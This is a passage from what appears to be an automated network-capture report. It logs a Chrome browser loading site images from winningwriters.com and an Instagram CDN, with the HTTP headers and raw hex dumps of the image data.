                                                                                                                                                                                            2024-11-18 20:00:06 UTC4044INData Raw: 3f fa 35 ab de bf 63 bf f9 18 7c 4f ff 00 5e 51 7f e8 66 be 73 d4 6f a5 d5 35 0b bb eb 9d be 7d d4 cf 34 9b 46 06 e6 62 4e 07 a6 4d 7d 19 fb 1d ff 00 c8 c3 e2 7f fa f2 8b ff 00 43 35 e6 e1 f5 ac 8e aa 9f c3 67 d7 74 51 45 7b a7 9e 15 f3 ef ed 7b ff 00 24 fb 47 ff 00 b0 ca 7f e8 99 ab e8 2a f9 f7 f6 bd ff 00 92 7d a3 ff 00 d8 65 3f f4 4c d5 cf 88 fe 1c 8d 69 fc 68 f8 c6 be 97 f0 af ec a3 07 89 7c 31 a3 6b 2d e2 a9 2d 8e a3 63 0d d1 88 69 c1 bc bd e8 1b 6e 7c c1 9c 67 19 c0 af 9a 2b f4 8f e1 6f fc 93 4f 07 7f d8 16 cf ff 00 44 ad 79 d8 5a 71 a9 26 a4 8e aa d2 71 4a c7 85 af ec 6f 6a 0f cf e3 09 88 f4 1a 68 1f fb 52 ba bf 0e 7e ca 5e 0b d2 26 49 f5 89 af f5 d7 53 9f 2e 69 04 51 1f f8 0a 00 7f 36 c5 7b b5 15 e8 ac 3d 25 f6 4e 57 56 6f a9 5b 4f d3 ad 34 9b 38
                                                                                                                                                                                            Data Ascii: ?5c|O^Qfso5}4FbNM}C5gtQE{{$G*}e?Lih|1k--cin|g+oODyZq&qJojhR~^&IS.iQ6{=%NWVo[O48
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: d5 4f 19 cf 15 eb 54 57 35 3c 34 29 cb 99 33 69 55 94 d5 99 5b 50 b0 b7 d5 2c 2e ac 6f e2 59 ad 6e a2 68 66 8d ba 3a 30 20 8f c4 1a f8 77 51 fd 99 3c 7f 0e bb 73 6b a6 e9 2b 71 a6 2d cb 24 17 ad 7b 02 86 8b 76 04 85 4b ee 1c 72 46 33 5f 75 d1 57 56 8c 6b 5b 9b a1 30 a8 e1 b1 93 e1 8f 0f da 78 53 c3 fa 6e 8b a6 2e db 5b 08 16 14 38 c1 6c 0e 58 fb 93 92 7d c9 ae 53 e3 6f 86 b5 4f 17 fc 33 d6 b4 7f 0e da fd b3 52 b9 30 79 50 f9 89 1e ed b3 c6 cd f3 31 00 7c aa 4f 27 b5 7a 0d 15 ab 8a 71 e5 e8 42 6d 3b 9f 01 ff 00 c3 37 fc 4e ff 00 a1 67 ff 00 2a 36 bf fc 76 be ca f8 51 a1 df f8 6b e1 df 87 f4 9d 6e 0f b2 ea 16 96 db 27 8b 7a be d6 dc 4e 32 a4 83 d7 b1 ae ca 8a c2 96 1e 34 dd e2 69 3a 8e 6a cc f8 7f c6 9f 00 3e 22 ea de 31 f1 0e a1 a7 f8 77 ce b4 bb d4 ee 67
                                                                                                                                                                                            Data Ascii: OTW5<4)3iU[P,.oYnhf:0 wQ<sk+q-${vKrF3_uWVk[0xSn.[8lX}SoO3R0yP1|O'zqBm;7Ng*6vQkn'zN24i:j>"1wg
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: 28 a7 15 dc f4 ff 00 04 fc 6a f0 87 8f f5 67 d2 bc 3d 7d 2b 5f 08 8c ab 1c f0 34 5b d4 63 3b 73 d4 8c e7 1e 99 3d 8d 7a 15 7e 60 68 1a e5 f7 86 75 9b 1d 5f 47 98 c1 7d 65 28 96 17 1e a3 b1 1d c1 19 04 77 04 8a fd 18 f8 7d e3 6b 1f 88 3e 14 b1 d7 74 d2 14 4e bb 67 87 39 30 cc 3e fa 1f a1 e9 ea 08 3d eb 5c 3d 7f 6b 75 2d c8 ab 4f 93 55 b1 91 e3 af 8c 5e 16 f8 75 a9 db e9 de 26 b8 b9 86 e6 78 04 e8 22 b7 69 01 42 c5 7a 8f 75 35 b3 e0 8f 1d 68 df 10 b4 89 35 5f 0d 4b 2c b6 71 ce d6 ec d2 c4 63 3b c2 a9 3c 1f 66 15 f2 cf ed 7d ff 00 23 ee 8b ff 00 60 75 ff 00 d1 d2 d7 65 f0 0b 5e 93 c2 df 00 7c 57 ac c0 a1 e6 b0 bb bb 9a 25 23 82 e2 08 b6 e7 db 38 a4 ab cb da b8 3d 90 dd 35 c8 a4 b7 3d 7f c7 3f 17 fc 23 f0 f5 fc 8f 10 ea 63 ed c5 43 0b 3b 74 32 cd 83 d0 90 38
                                                                                                                                                                                            Data Ascii: (jg=}+_4[c;s=z~`hu_G}e(w}k>tNg90>=\=ku-OU^u&x"iBzu5h5_K,qc;<f}#`ue^|W%#8=5=?#cC;t28
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: 2f 7f 35 c1 d5 b5 e9 53 61 ba 68 f6 24 2a 7a ac 6b ce 33 dd 89 c9 f6 19 15 6e 15 71 13 4e 4a c9 12 a5 0a 71 76 77 3e 48 f8 e1 aa cb ab fc 57 f1 4c d3 b1 63 0d eb 5b 28 f4 58 80 8c 0f fc 76 be ca f8 15 e1 bb 6f 0d 7c 2d f0 f2 5a c6 ab 25 f5 aa 5f dc 38 1c bb ca a1 f2 7e 8a 55 7e 8a 2b e4 1f 8f fa 04 da 07 c5 7f 10 2c a8 44 57 b2 8b d8 58 8e 1d 64 19 24 7d 1b 70 fc 2b ea af d9 db c6 f6 9e 2b f8 73 a6 d9 24 cb fd a5 a3 42 b6 77 30 e7 e6 55 51 88 db 1e 85 40 e7 d4 11 da 8c 3d 95 79 5f 70 ab fc 35 63 d6 ab ce fe 39 f8 6e db c4 bf 0b bc 45 1d d4 6a d2 59 5a 3d f5 bb 91 ca 49 12 97 c8 fa 80 cb f4 63 5e 89 5e 4d fb 43 f8 de d3 c2 7f 0e 75 3b 37 99 7f b4 75 98 5e ca da 1c fc cc ae 31 23 63 d0 21 3c fa 90 3b d7 a1 55 a5 07 73 9e 17 e6 56 3e 47 f8 23 aa cb a4 7c 56
                                                                                                                                                                                            Data Ascii: /5Sah$*zk3nqNJqvw>HWLc[(Xvo|-Z%_8~U~+,DWXd$}p++s$Bw0UQ@=y_p5c9nEjYZ=Ic^^MCu;7u^1#c!<;UsV>G#|V
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: 56 a6 86 3b 88 64 86 e2 34 96 19 14 a3 a3 a8 65 65 23 04 10 7a 82 2a e1 0e 58 28 8a 52 bc ae 7e 5f 69 1a 9c fa 26 ab 63 a9 d8 95 17 56 37 11 dc 42 58 64 6f 46 0c b9 1d c6 40 af 5f ff 00 86 a8 f8 83 ff 00 3d b4 df fc 02 1f e3 5f 5d ff 00 c2 b1 f0 47 fd 09 de 1d ff 00 c1 4c 1f fc 4d 1f f0 ac 7c 11 ff 00 42 77 87 7f f0 53 07 ff 00 13 5c 31 c2 d5 87 c3 2b 1b ba d0 96 e8 f9 15 7f 6a 7f 88 25 80 33 69 bc 9f f9 f2 1f e3 5f 72 57 2b ff 00 0a cb c1 03 a7 83 bc 3d ff 00 82 98 3f f8 9a ea ab aa 8c 27 0b f3 ca e6 33 94 65 b2 b0 57 83 7e d5 5e 33 fe c2 f0 34 3a 15 ac 9b 6e f5 c9 76 38 07 91 04 78 67 fc db 60 f7 05 ab de 6b 1b 58 f0 8f 87 fc 43 34 73 eb fa 16 97 aa cd 1a ec 49 2f 2c a3 99 95 73 9c 02 c0 90 33 da b4 a9 17 38 38 ae a4 c5 a8 ca ec f8 eb f6 66 f8 71 65 e3
                                                                                                                                                                                            Data Ascii: V;d4ee#z*X(R~_i&cV7BXdoF@_=_]GLM|BwS\1+j%3i_rW+=?'3eW~^34:nv8xg`kXC4sI/,s388fqe


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            14192.168.2.164972566.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:06 UTC906OUTGET /assets/images/social-sprite-2019.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/assets/css/style.css
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:06 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:06 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Mon, 28 Oct 2024 15:22:41 GMT
                                                                                                                                                                                            ETag: "c4b-6258b0a28e34c"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 3147
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:06 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:06 UTC3147INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 76 00 00 00 16 08 06 00 00 00 15 53 68 4b 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 0b e0 49 44 41 54 68 43 ed 5a 7b 70 54 d5 19 ff ce dd dd 3c 40 13 0d 63 48 08 41 03 65 40 a9 15 47 8c 81 24 bb 09 1a 0c 0f 1d 1f 13 14 05 1d a7 68 b5 76 da 6a 5b 14 a7 b5 d6 3f 74 3a 9d 6a a1 0f 1d eb 54 e4 21 0a 2a f2 10 68 23 24 9b b7 18 2b 0f 05 db 3a 81 40 c8 83 67 0a 62 92 7d dc d3 df 77 ee d9 cd 26 b9 9b dd 05 fe ab bf c9 97 7b ce 77 ef 3d f7 7c e7 3b e7 7b 9c b3 82 a2 a0 a0 a0 20 35 29 29 a9 40 08 39 4d 92 2c 24 41 37 90 a4 54 bc f0 85 14 54 4f c2 68 f6 3b fd 75 8d 95 8d c7 f4 2b 17 15 d3 cb a6 67
                                                                                                                                                                                            Data Ascii: PNGIHDRvShKsRGBgAMAapHYsodIDAThCZ{pT<@cHAe@G$hvj[?t:jT!*h#$+:@gb}w&{w=|;{ 5))@9M,$A7TTOh;u+g


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            15192.168.2.164972366.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:06 UTC915OUTGET /assets/images/seal-transparent-25x40-2019.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/assets/css/style.css
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:06 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:06 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Thu, 22 Sep 2022 15:10:56 GMT
                                                                                                                                                                                            ETag: "d5d-5e94577dee15d"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 3421
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:06 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:06 UTC3421INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2c 00 00 00 28 08 06 00 00 00 85 15 18 17 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 0c f2 49 44 41 54 58 47 9d 99 07 78 15 55 16 c7 ef cc bc 97 e4 bd 24 a4 d0 bb 04 08 20 41 08 62 db b5 bb 82 82 ba 22 45 04 95 66 41 3f 2c 28 45 70 0b 20 8a f8 c9 ba 80 22 82 52 45 9a 02 9f 22 a0 88 e8 4a 10 a9 22 bd 23 cd 54 d2 cb 6b 33 fb 3b f3 5e 42 12 12 02 fe bf ef e4 96 39 f7 9c ff bd 73 ee b9 77 5e 34 75 95 f8 78 ee 02 19 f3 0a 32 09 49 7a 6a c8 c0 e3 d2 bf 60 d1 12 dd e5 8a 30 fa f6 ee e9 93 76 29 56 7c b1 da 51 58 58 68 0d 7a 72 40 40 da 0b 16 7d e6 f0 fb fd 7f 50 7d cf 30 8c 29 a5 fd 57 8a ab 22
                                                                                                                                                                                            Data Ascii: PNGIHDR,(sRGBgAMAapHYsodIDATXGxU$ Ab"EfA?,(Ep "RE"J"#Tk3;^B9sw^4ux2Izj`0v)V|QXXhzr@@}P}0)W"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            16192.168.2.164972466.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:06 UTC894OUTGET /assets/images/search.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/assets/css/style.css
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:06 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:06 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 24 Oct 2018 18:10:40 GMT
                                                                                                                                                                                            ETag: "63c-578fd6760a800"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 1596
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:06 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1596INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 1c 08 02 00 00 00 ac fb 7b a0 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 b1 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 30 2d 63 30 36 31 20 36 34 2e 31 34 30 39 34 39 2c 20 32 30 31 30 2f 31 32 2f 30 37 2d 31 30 3a 35 37 3a 30 31 20 20
                                                                                                                                                                                            Data Ascii: PNGIHDR2{tEXtSoftwareAdobe ImageReadyqe<iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            17192.168.2.1649732157.240.249.634436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:06 UTC859OUTGET /v/t51.2885-15/466782117_1219872592424759_7207578631427954565_n.jpg?_nc_cat=108&ccb=1-7&_nc_sid=18de74&_nc_ohc=bwWPeBBNLe4Q7kNvgEG96g1&_nc_zt=23&_nc_ht=scontent-ord5-1.cdninstagram.com&edm=AL-3X8kEAAAA&oh=00_AYBDimk3lRDq0ZNf5WzC3TsApGkaW3ypEC04xNJeJXPwgg&oe=67416EA5 HTTP/1.1
                                                                                                                                                                                            Host: scontent-ord5-1.cdninstagram.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:06 UTC582INHTTP/1.1 200 OK
                                                                                                                                                                                            x-additional-error-detail:
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 22:01:51 GMT
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            X-Needle-Checksum: 2333707590
                                                                                                                                                                                            content-digest: adler32=2333707590
                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Cache-Control: max-age=1209600, no-transform
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:06 GMT
                                                                                                                                                                                            X-FB-Connection-Quality: EXCELLENT; q=0.9, rtt=22, rtx=0, c=13, mss=1380, tbw=3357, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 92324
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1INData Raw: ff
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1500INData Raw: d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 09 06 07 08 07 06 09 08 08 08 0a 0a 09 0b 0e 17 0f 0e 0d 0d 0e 1c 14 15 11 17 22 1e 23 23 21 1e 20 20 25 2a 35 2d 25 27 32 28 20 20 2e 3f 2f 32 37 39 3c 3c 3c 24 2d 42 46 41 3a 46 35 3b 3c 39 ff db 00 43 01 0a 0a 0a 0e 0c 0e 1b 0f 0f 1b 39 26 20 26 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 ff c0 00 11 08 04 38 04 38 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23
                                                                                                                                                                                            Data Ascii: JFIFC"##! %*5-%'2( .?/279<<<$-BFA:F5;<9C9& &9999999999999999999999999999999999999999999999999988"}!1AQa"q2#
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 a9 eb 5f f2 07 be ff 00 af 79 3f f4 13 57 2a 9e b5 ff 00 20 7b ef fa f7 93 ff 00 41 35 15 3e 07 e8 5d 3f 8d 7a 9c 66 9f e0 ad 6e fa da 3b 88 a0 8c 24 8a 19 4b 48 01 20 d4 e7 e1 f7 88 47 fc b0 84 ff 00 db 51 58 9a 7e b3 a8 e9 ce ad 6b 79 2a 05 39 0a 18 95 fc ba 57 b7 78 7b 53 5d 5b 47 b5 bd 18 06 44 f9 80 e8 1b a1 1f 9d 78 98 7a 34 6a e9 ad cf 4b 1b 8a c5 61 6d 2d 1a 7e 4f fc cf 2c ff 00 85 7f e2 0f f9 e3 0f fd fd 15 8b ad 68 d7 ba 24 f1 c1 7b 1a a3 c8 bb d7 6b 06 c8 ce 3b 57 a3 fc 4c 7d 4a da ca da f6 ca ee 68 51 1b 64 ab 1b 11 9c f4 3f a6 3f 1a f2 eb bb bb 8b c7 0f 75 71 24 ce 06 01 91 8b 10 2b 2c 45 3a 74 9f 2a 4e e6 f8 0a f5 f1 11 55 24 d5 bb 59 dc db
                                                                                                                                                                                            Data Ascii: ((((((((_y?W* {A5>]?zfn;$KH GQX~ky*9Wx{S][GDxz4jKam-~O,h${k;WL}JhQd??uq$+,E:t*NU$Y
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: 99 e4 ba b8 96 e2 66 dd 2c ac 59 8f a9 35 1d 14 57 0b 77 3d 68 c6 ca c8 2b d2 3e 14 6a e4 8b 9d 2a 43 c0 fd ec 59 fc 98 7f 23 f9 d7 9b d5 ad 37 50 ba d2 ef 23 bc b4 93 cb 95 33 83 8c 8e 46 0f 15 b5 0a be ca 6a 47 2e 33 0f f5 8a 2e 9f 5e 9e a7 6f f1 63 53 2f 71 6b a6 23 7c b1 8f 36 41 ee 78 5f d3 3f 9d 79 f5 59 d4 2f ae 35 2b c9 2e ee a4 df 33 fd e6 c0 1d b1 d0 55 6a 2b d5 f6 b3 72 1e 0e 87 b0 a3 1a 7d bf 30 a2 8a 2b 03 a8 2b d5 74 5f f9 03 d8 ff 00 d7 bc 7f fa 08 af 2a af 55 d1 7f e4 0f 63 ff 00 5e f1 ff 00 e8 22 bd 4c af e3 97 a1 e5 66 bf 04 7d 4b b4 51 45 7b 67 8a 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 5f d3 2c 45 c1 32 4b 9f 2c 1c 63 fb c6 b6 56 d6 dd 46 04 11
                                                                                                                                                                                            Data Ascii: f,Y5Ww=h+>j*CY#7P#3FjG.3.^ocS/qk#|6Ax_?yY/5+.3Uj+r}0++t_*Uc^"Lf}KQE{gQEQEQEQEQEQEQEQEQEQEQE_,E2K,cVF
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: 4b b8 2e 36 f5 f2 a4 0f 8f ca 98 16 28 a2 aa be a3 62 90 c9 3b de db 2c 31 b6 c7 73 2a 85 56 f4 27 3c 1e 45 00 5a a2 aa d8 ea 56 1a 80 63 65 7d 6d 74 17 af 93 2a be 3f 23 52 5e 1b 7f b3 48 b7 4c 8b 0b 0d ac 5d b6 8c 1f 7a 40 3d 25 8d d9 d5 1d 59 90 e1 80 39 2a 7d eb 2b c5 1e 20 87 c3 7a 69 be 9e da e2 68 c3 05 3e 56 df 94 9e 99 c9 18 1f 9d 71 9f 07 ee ed 2d 6c 35 78 e5 b9 8a 31 f6 b3 b7 cc 90 02 46 3a f3 d6 b6 be 2c 10 de 04 bc 65 20 82 d1 10 47 7f 9d 69 5f 4b 91 cf 78 73 23 a8 d3 2e c5 fe 9b 69 78 13 60 b8 85 25 db 9c ed dc 01 c6 7f 1a b3 59 1e 1e 9a 28 3c 2d a4 bc d2 a4 69 f6 38 46 e7 60 07 dc 1e b5 a5 05 cc 17 20 98 27 8e 50 bd 4a 38 6c 7e 54 cb 4f 42 5a 2a 39 a6 8a 04 df 34 a9 1a 74 dc ec 00 fd 69 62 96 39 a3 12 45 22 c8 87 a3 29 c8 3f 8d 30 1f 4d 90
                                                                                                                                                                                            Data Ascii: K.6(b;,1s*V'<EZVce}mt*?#R^HL]z@=%Y9*}+ zih>Vq-l5x1F:,e Gi_Kxs#.ix`%Y(<-i8F` 'PJ8l~TOBZ*94tib9E")?0M
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4044INData Raw: f2 3f ba 6a e2 fa 1d 34 6a 7d 96 78 d7 86 35 eb 2d 07 c4 1e 35 b9 bc 7e b7 db 62 89 7e fc ad e6 4b 85 51 fe 71 5d 9e 91 a2 4f 73 7c ba de ba 23 93 50 c6 20 80 7c d1 da 29 ec be ad ea df 97 15 c2 68 9e 19 b3 f1 2e bb e3 6b 6b 90 16 65 bb 6f 22 6e f1 31 92 4e 7e 87 03 3e d5 d3 fc 36 d6 ee e5 bd 7f 09 6b 4d e5 ea 96 99 58 9d cf fa d4 03 d7 b9 03 91 ea 39 ec 68 5e 63 8b b7 c5 b1 73 e2 95 a2 5c 78 1b 53 95 e3 04 db 88 e4 56 23 94 3e 62 8e 3f 32 2b 53 e1 97 83 34 75 f0 ae 9b a9 5f 5a 45 a8 de dd 5b 23 19 6e 94 4b b1 31 f2 a2 86 c8 50 06 07 15 6f e2 cd b2 5a fc 30 d6 63 4f ee 47 93 dc 9f 35 2b 67 e1 df fc 88 9e 1f ff 00 af 08 7f f4 11 52 dd d9 8d 49 f3 4a e7 07 e2 1b 48 bc 01 f1 0b 40 bd d1 97 ec da 76 b5 2f d9 ae ed 23 e2 2c e5 46 e0 bd 07 df 07 8f ee 9f 5a ed
